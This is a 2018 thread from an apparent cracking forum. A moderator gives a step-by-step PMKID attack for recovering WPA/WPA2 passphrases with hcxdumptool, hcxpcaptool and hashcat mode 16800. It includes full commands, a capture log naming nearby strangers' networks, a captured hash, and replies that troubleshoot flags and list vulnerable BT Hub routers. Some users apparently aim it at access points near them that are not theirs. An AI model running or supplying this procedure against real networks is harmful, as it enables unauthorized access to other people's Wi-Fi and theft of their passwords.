Home - Wireless Cracking - WPA/WPA2 PMKID attack step-by-step (hashcat mode 16800)


27 Results - Page 1 of 1 -
1
Author Message
Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Team:
Reputation: 5725 Reputation
Offline
Sun, 05 Aug 2018 @ 23:30:31

There is a new technique has been developed to crack WPA PSK (Pre-Shared Key) passwords: PMKID attack

Requirements:

- hcxdumptool v4.2.0 or higher for capturing traffic
- hcxtools v4.2.0 or higher
- hashcat v4.2.0 or higher

Using this method capture of a full EAPOL 4-way handshake is not required. It will work against all APs with roaming functions enabled.

Stop unnecessary services:
systemctl stop wpa_supplicant.service
systemctl stop network-manager.service

Start wireless device (wlan1) in monitor mode (do not use virtual interface):
ip link set wlan1 down
iw dev wlan1 set type monitor
ip link set wlan1 up
iw dev

Scan wireless networks. We need only the AP's MAC address.


Capture PMKID using hcxdumptool:
1. Create MAC filter file (format: 112233445566 + comment. Maximum line length 128, maximum entries 32.)
use filter mode 2 to attack MAC addresses in the filter file.

2. hcxdumptool -i wlan1 -o hcxdump.pcapng --filtermode=2 --filterlist=filter.txt --enable_status (Ctrl +D stop caturing)

root@Xenon-XR2:~/hcxtools_temporary/20180805# hcxdumptool -i wlan1 -o hcxdump.pcapng --filtermode=2 --filterlist=filter.txt --enable_status

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1
FILTERLIST...............: 1 entries
MAC CLIENT...............: f0a225a4d105 (client)
MAC ACCESS POINT.........: 000dc2f0a2da (start NIC)
EAPOL TIMEOUT............: 1000000
DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039
ANONCE...................: af981dd4e9a67a1ec750da8d4609b36670a08296fe2a24462e3c227c33c59162

[20:30:40 - 001] b8ee0e540bf5 -> b4ef39acc15e Telekom-4UJYbz [PROBERESPONSE, SEQUENCE 649, AP CHANNEL 1]
[20:30:41 - 001] 704f57966e24 -> daa119f2a67a TP-Link_6I24 [PROBERESPONSE, SEQUENCE 902, AP CHANNEL 2]
[20:30:41 - 001] 4c5e0cd05175 -> daa119f2a67a freeroute [PROBERESPONSE, SEQUENCE 2147, AP CHANNEL 1]
[20:30:41 - 001] 602e201acd8c -> daa119f2a67a T-1DCD7D [PROBERESPONSE, SEQUENCE 2737, AP CHANNEL 2]
[20:30:41 - 001] daa119f2a67a -> ffffffffffff Szendi [PROBEREQUEST, SEQUENCE 1936]
[20:30:41 - 001] 4e5e0cd05175 -> daa119f2a67a freeroute_VAP [PROBERESPONSE, SEQUENCE 2148, AP CHANNEL 1]
[20:30:50 - 005] 74c63b30d235 -> ffffffffffff TOKI [PROBEREQUEST, SEQUENCE 2052]
[20:30:50 - 005] 10feedc53a40 -> 74c63b30d235 TOKI [PROBERESPONSE, SEQUENCE 151, AP CHANNEL 6]
[20:30:55 - 007] 8416f9b6be78 -> 843835be30d2 TP-LINK_PM [PROBERESPONSE, SEQUENCE 275, AP CHANNEL 8]
[20:30:57 - 007] 001c10bf823f -> 801934413156 DIB [PROBERESPONSE, SEQUENCE 1903, AP CHANNEL 6]
[20:30:57 - 007] 801934413156 -> ffffffffffff TP-LINK_12FC [PROBEREQUEST, SEQUENCE 513]
[20:31:03 - 011] 606dc7a599e9 -> f0a225a4d105 SETUP [PROBERESPONSE, SEQUENCE 1139, AP CHANNEL 11]
[20:31:03 - 011] f0a225a4d105 -> 2c4d5483d610 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 0, STATUS 1]
[20:31:03 - 011] 2c4d5483d610 -> f0a225a4d105 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 2593, STATUS 2]
[20:31:06 - 011] 2c4d5483d610 -> 8c34fd4d6b40 Amigo [PROBERESPONSE, SEQUENCE 2625, AP CHANNEL 11]
[20:31:06 - 011] f0a225a4d105 -> 2c4d5483d610 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 1, STATUS 1]
[20:31:06 - 011] 2c4d5483d610 -> f0a225a4d105 [AUTHENTICATION, OPEN SYSTEM, SEQUENCE 2648, STATUS 2]
[20:31:06 - 011] f0a225a4d105 -> 2c4d5483d610 Amigo [ASSOCIATIONREQUEST, SEQUENCE 0]
[20:31:06 - 011] 2c4d5483d610 -> f0a225a4d105 [ASSOCIATIONRESPONSE, SEQUENCE 2649]
[20:31:06 - 011] 2c4d5483d610 -> f0a225a4d105 [FOUND PMKID]
[20:31:08 - 013] 74d21d35ca63 -> ffffffffffff TP-LINK_4A4558 [PROBEREQUEST, SEQUENCE 1966]
[20:31:08 - 013] 487b6b37d898 -> 74d21d35ca63 T-37D438 [PROBERESPONSE, SEQUENCE 294, AP CHANNEL 13]
[20:31:09 - 013] b4ef39acc15e -> ffffffffffff Telekom-4UJYbz [PROBEREQUEST, SEQUENCE 1806]
^C
terminated...


Strip PMKID (-z options)

root@Xenon-XR2:~/hcxtools_temporary/20180805# hcxpcaptool -z PMKID.txt -o hcxdump.hccapx -E wordlist -I identitylist -U usernamelist -P PMKlist -T trafficlist *.pcapng
start reading from hcxdump.pcapng

summary:
--------
file name....................: hcxdump.pcapng
file type....................: pcapng 1.0
file hardware information....: i686
file os information..........: Linux 4.16.0-kali2-686-pae
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 45
skipped packets..............: 0
packets with FCS.............: 42
beacons (with ESSID inside)..: 20
probe requests...............: 5
probe responses..............: 11
association requests.........: 1
association responses........: 1
authentications (OPEN SYSTEM): 4
authentications (BROADCOM)...: 2
EAPOL packets................: 2
EAPOL PMKIDs.................: 1

1 PMKID(s) written to PMKID.txt

The content of PMKID.txt file should be: PMKID*MAC AP*MAC Station*ESSID

root@Xenon-XR2:~/hcxtools_temporary/20180805# cat PMKID.txt
f68d151bae4e54e2b97aa80b090218db*2c4d5483d610*f0a225a4d105*4272656e647a73616b

Start hashcat with mode 16800

root@Xenon-XR2:/usr/local/src/hashcat-4.2.0# ./hashcat32.bin -m 16800 'f68d151bae4e54e2b97aa80b090218db*2c4d5483d610*f0a225a4d105*4272656e647a73616b' /usr/share/wordlists/rockyou.txt

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: f68d151bae4e54e2b97aa80b090218db*2c4d5483d610*f0a22...73616b
Time.Started.....: Sun Aug 5 20:39:51 2018 (2 secs)
......

More info can be found: https://hashcat.net/forum/thread-7717-post-41446.html#pid41446
and
https://hashcat.net/forum/thread-6661-post-41434.html#pid41434


If I helped a +rep is appreciated!

BTC donation: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
jojo93

Status: n/a
Joined: Sun, 20 May 2018
Posts: 57
Team:
Reputation: 60 Reputation
Offline
Sun, 05 Aug 2018 @ 23:48:15

I will test and update you ,,,,
thanks for your effort


Avatar
Hashcat2018

Status: n/a
Joined: Fri, 27 Jul 2018
Posts: 20
Team:
Reputation: 0 Reputation
Offline
Mon, 06 Aug 2018 @ 22:50:45

I have this error in hcxdumptool:

failed to init globals


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Team:
Reputation: 5725 Reputation
Offline
Mon, 06 Aug 2018 @ 22:59:05

Hashcat2018 said:

I have this error in hcxdumptool:

failed to init globals

What was the command you used?
Check the filterlist.file. Correct MAC address format: 112233445566 + comment (without colon)


If I helped a +rep is appreciated!

BTC donation: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
Hashcat2018

Status: n/a
Joined: Fri, 27 Jul 2018
Posts: 20
Team:
Reputation: 0 Reputation
Offline
Mon, 06 Aug 2018 @ 23:27:21

I do not understand how it is + comment (without colon)
Example please


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Team:
Reputation: 5725 Reputation
Offline
Mon, 06 Aug 2018 @ 23:34:02

Try without filter option at first: "hcxdumptool -i wlan1 -o hcxdump.pcapng --enable_status"


If I helped a +rep is appreciated!

BTC donation: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
Hashcat2018

Status: n/a
Joined: Fri, 27 Jul 2018
Posts: 20
Team:
Reputation: 0 Reputation
Offline
Mon, 06 Aug 2018 @ 23:37:48

freeroute said:

Try without filter option at first: "hcxdumptool -i wlan1 -o hcxdump.pcapng --enable_status"

OK, thank you very much


Avatar
vtar

Status: n/a
Joined: Wed, 07 Mar 2018
Posts: 79
Team:
Reputation: 6 Reputation
Offline
Tue, 07 Aug 2018 @ 00:40:39

Works on tkip and ccmp?


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Team:
Reputation: 5725 Reputation
Offline
Tue, 07 Aug 2018 @ 08:26:20

TKIP and CCMP are security (encryption) protocols. It works on both if roaming is enabled.


If I helped a +rep is appreciated!

BTC donation: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
vtar

Status: n/a
Joined: Wed, 07 Mar 2018
Posts: 79
Team:
Reputation: 6 Reputation
Offline
Tue, 07 Aug 2018 @ 09:46:02

What do you mean roaming?


Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Team:
Reputation: 5725 Reputation
Offline
Tue, 07 Aug 2018 @ 11:40:22

https://en.wikipedia.org/wiki/IEEE_802.11r-2008
https://en.wikipedia.org/wiki/Wireless_LAN#Roaming
https://www.draytek.com/en/faq/faq-wlan/wlan.wireless-lan/what-is-wireless-roaming/


If I helped a +rep is appreciated!

BTC donation: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 1792
Team:
Reputation: 5725 Reputation
Offline
Tue, 07 Aug 2018 @ 22:33:31

Video demonstration: https://youtu.be/ve_0Qhd0bSM


If I helped a +rep is appreciated!

BTC donation: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
kangaroot

Status: n/a
Joined: Thu, 07 Dec 2017
Posts: 135
Team:
Reputation: 20 Reputation
Offline
Tue, 07 Aug 2018 @ 23:08:04

Tested, works just fine. Thank you for researching.


Avatar
kangaroot

Status: n/a
Joined: Thu, 07 Dec 2017
Posts: 135
Team:
Reputation: 20 Reputation
Offline
Wed, 08 Aug 2018 @ 15:26:00

Not sure if this info useful to anyone, but following hubs are vulnerable to this attack:

BTHub3 (HuaweiTe)
BTHub4 (Arcadyan)
BTHub6 (Sagemcom)

Also, the attack is successful on following adapters:

ALFA AWUS036NHA (black) - Atheros AR9271
ALFA AWUS036H (grey) - Realtek RTL8187
ALFA AWUS036NH (green) - Ralink RT2870/RT3070


Avatar
dark0

Status: n/a
Joined: Tue, 13 Feb 2018
Posts: 40
Team:
Reputation: 10 Reputation
Offline
Thu, 09 Aug 2018 @ 15:51:26

Test Also and at BELL_XXX Is working!!


Avatar
hashbaby

Status: n/a
Joined: Thu, 24 Dec 2015
Posts: 113
Team: OneforALL
Reputation: 263 Reputation
Offline
7 days ago

I'm using hcxdumptool 4.2.1 and get an error when using --enable_status I get an error with "requires an argument" and wanted to find out what value I should set?


moved to 4.2.1
enabled hardware handshake instead of software handshake
changed beavior auf status:
--enable_status=digit : enables status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATON
8: ASSOCIATION


Avatar
acidfk

Status: n/a
Joined: Tue, 10 Jul 2018
Posts: 90
Team:
Reputation: 30 Reputation
Offline
7 days ago

hashbaby said:

I'm using hcxdumptool 4.2.1 and get an error when using --enable_status I get an error with "requires an argument" and wanted to find out what value I should set?


moved to 4.2.1
enabled hardware handshake instead of software handshake
changed beavior auf status:
--enable_status=digit : enables status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATON
8: ASSOCIATION[/quote

it really dont matter, i use 4, but if the pmkid is found you always get the message.


Avatar
kevtheskin

Status: n/a
Joined: Wed, 21 Feb 2018
Posts: 61
Team:
Reputation: 0 Reputation
Offline
6 days ago

freeroute said:

Try without filter option at first: "hcxdumptool -i wlan1 -o hcxdump.pcapng --enable_status"

Hi what do you add after enable_status ?


Avatar
kevtheskin

Status: n/a
Joined: Wed, 21 Feb 2018
Posts: 61
Team:
Reputation: 0 Reputation
Offline
6 days ago

Hi all,

Am I missing something here.
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev


Avatar
Hashcat2018

Status: n/a
Joined: Fri, 27 Jul 2018
Posts: 20
Team:
Reputation: 0 Reputation
Offline
6 days ago

kevtheskin said:

Hi all,

Am I missing something here.
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev

Test with hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --enable_status=2


Avatar
Hashcat2018

Status: n/a
Joined: Fri, 27 Jul 2018
Posts: 20
Team:
Reputation: 0 Reputation
Offline
6 days ago

Sorry. Mistake


Avatar
karTEEK

Status: n/a
Joined: Sat, 21 Apr 2018
Posts: 119
Team:
Reputation: 74 Reputation
Online
6 days ago

kevtheskin said:

Hi all,

Am I missing something here.
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev


try --enable_status=1.
i tried both 1 & 2, i got pmkids only for status 1


status::::::::cracked

Avatar
kevtheskin

Status: n/a
Joined: Wed, 21 Feb 2018
Posts: 61
Team:
Reputation: 0 Reputation
Offline
5 days ago

karTEEK said:

kevtheskin said:

Hi all,

Am I missing something here.
root@kali:~# hcxdumptool -o hash -i wlan1mon --filterlist=/root/Desktop/filter.txt --filtermode=2 --enable_status
hcxdumptool: option '--enable_status' requires an argument

If I add 4 after status I get
INTERFACE:...............: wlan1mon
FILTERLIST...............: 4 entries
MAC CLIENT...............: f0a22551eacb (client)
MAC ACCESS POINT.........: 00221cdaeefd (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: bbaab63d64aa1d2efdc09c1fc010f58f39cbc134b8173a37398d7eba1c6711d7 .

I don't have

DEAUTHENTICATIONINTERVALL: 20 beacons
GIVE UP DEAUTHENTICATIONS: 10 tries
REPLAYCOUNTER............: 62039

Any info much appreciated
Kev


try --enable_status=1.
i tried both 1 & 2, i got pmkids only for status 1

Hi thanks for reply. Di you notice on the video he did not add any number after enable_status ?


Avatar
kevtheskin

Status: n/a
Joined: Wed, 21 Feb 2018
Posts: 61
Team:
Reputation: 0 Reputation
Offline
5 days ago

Hi all ,
I can't get it to find pmkid . Lot's off Ap near me but just not working. Any more info please?


Avatar
Dorky

Status: n/a
Joined: Fri, 26 Aug 2016
Posts: 31
Team:
Reputation: 0 Reputation
Offline
5 days ago

kevtheskin said:

Hi all ,
I can't get it to find pmkid . Lot's off Ap near me but just not working. Any more info please?


Can you give more specific information such as any errors you are receiving?. Are you sure you entered in monitor mode correctly? Are you trying this attack on WPA/2. Maybe you discovered access points that do not support this kind of attack.


Avatar
vtar

Status: n/a
Joined: Wed, 07 Mar 2018
Posts: 79
Team:
Reputation: 6 Reputation
Offline
5 days ago

Maybe you are trying to attack WEP... Lol 😂


Avatar
karTEEK

Status: n/a
Joined: Sat, 21 Apr 2018
Posts: 119
Team:
Reputation: 74 Reputation
Online
5 days ago

kevtheskin said:

Hi thanks for reply. Di you notice on the video he did not add any number after enable_status ?


command in the video did not work for me either!! remove filter list option
this is my command "hcxdumptool -o test.pcapng -i wlan0 --enable_status=1". don't forget to keep your adapter in monitor mode
check whether your adapter is compatible, btw not all routers all vulnerable


status::::::::cracked


27 Results - Page 1 of 1 -
1

We have a total of 151566 messages in 18770 topics.
We have a total of 17897 registered users.
Our newest registered member is ziadeh.